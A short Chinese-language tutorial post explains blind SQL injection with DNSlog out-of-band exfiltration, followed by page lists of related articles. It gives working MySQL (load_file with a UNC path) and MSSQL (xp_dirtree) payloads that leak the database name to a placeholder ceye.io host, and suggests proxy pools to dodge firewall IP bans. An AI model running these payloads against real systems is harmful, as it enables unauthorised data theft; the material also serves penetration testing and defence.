SQL注入无回显,利用DNSlog构造方式

  1. 没有回显的情况下,一般编写脚本,进行自动化注入。但与此同时,由于

防火墙的存在,容易被封禁 IP,可以尝试调整请求频率,有条件的使用代理池进行请求。

  1. 此时也可以使用 DNSlog 注入,原理就是把服务器返回的结果放在域名中,然后读取 DNS 解析时的日志,来获取想要的信息。
  2. Mysql 中利用load_file()构造payload

‘ and if((select load_file(concat(‘\\\\’,(select database()),’.xxx.ceye.io\\abc’))),1,0)#

  1. Mssql 下利用 master..xp_dirtree 构造 payload

DECLARE @host varchar(1024);SELECT @host=(SELECT db_name())+’.xxx.ceye.io’;EXEC(‘master..xp_dirtree”\’+@host+’

\foobar$”‘);

 

相关推荐

  1. SQL注入利用DNSlog构造方式

    2024-03-19 17:42:02       38 阅读
  2. 26-4 SQL注入攻击 - 不同数据库系统利用dnslog姿势

    2024-03-19 17:42:02       46 阅读
  3. SQL主键

    2024-03-19 17:42:02       25 阅读
  4. SQL注入漏洞利用

    2024-03-19 17:42:02       48 阅读

最近更新

  1. docker php8.1+nginx base 镜像 dockerfile 配置

    2024-03-19 17:42:02       98 阅读
  2. Could not load dynamic library ‘cudart64_100.dll‘

    2024-03-19 17:42:02       106 阅读
  3. 在Django里面运行非项目文件

    2024-03-19 17:42:02       87 阅读
  4. Python语言-面向对象

    2024-03-19 17:42:02       96 阅读

热门阅读

  1. Linux学习笔记-Linux学习方法

    2024-03-19 17:42:02       46 阅读
  2. Ubuntu 22.04上构建libvirt源码错误解决

    2024-03-19 17:42:02       34 阅读
  3. C++ 接口的实现,及作用通俗理解方式

    2024-03-19 17:42:02       42 阅读
  4. 【代码随想录Day27】

    2024-03-19 17:42:02       41 阅读
  5. VUE3 自定义指令

    2024-03-19 17:42:02       43 阅读
  6. Leetcode--198

    2024-03-19 17:42:02       40 阅读
  7. Spring--设计模式

    2024-03-19 17:42:02       32 阅读
  8. UGUI源码分析与研究1-UGUI底层的实现原理

    2024-03-19 17:42:02       35 阅读
  9. 阿里巴巴中国站按关键字搜索工厂数据 API

    2024-03-19 17:42:02       36 阅读
  10. python代码截取任意页的pdf

    2024-03-19 17:42:02       45 阅读
  11. 数组的reduce 的使用和扁平化处理

    2024-03-19 17:42:02       36 阅读
  12. 在事务里发送普通消息引起的线上问题

    2024-03-19 17:42:02       47 阅读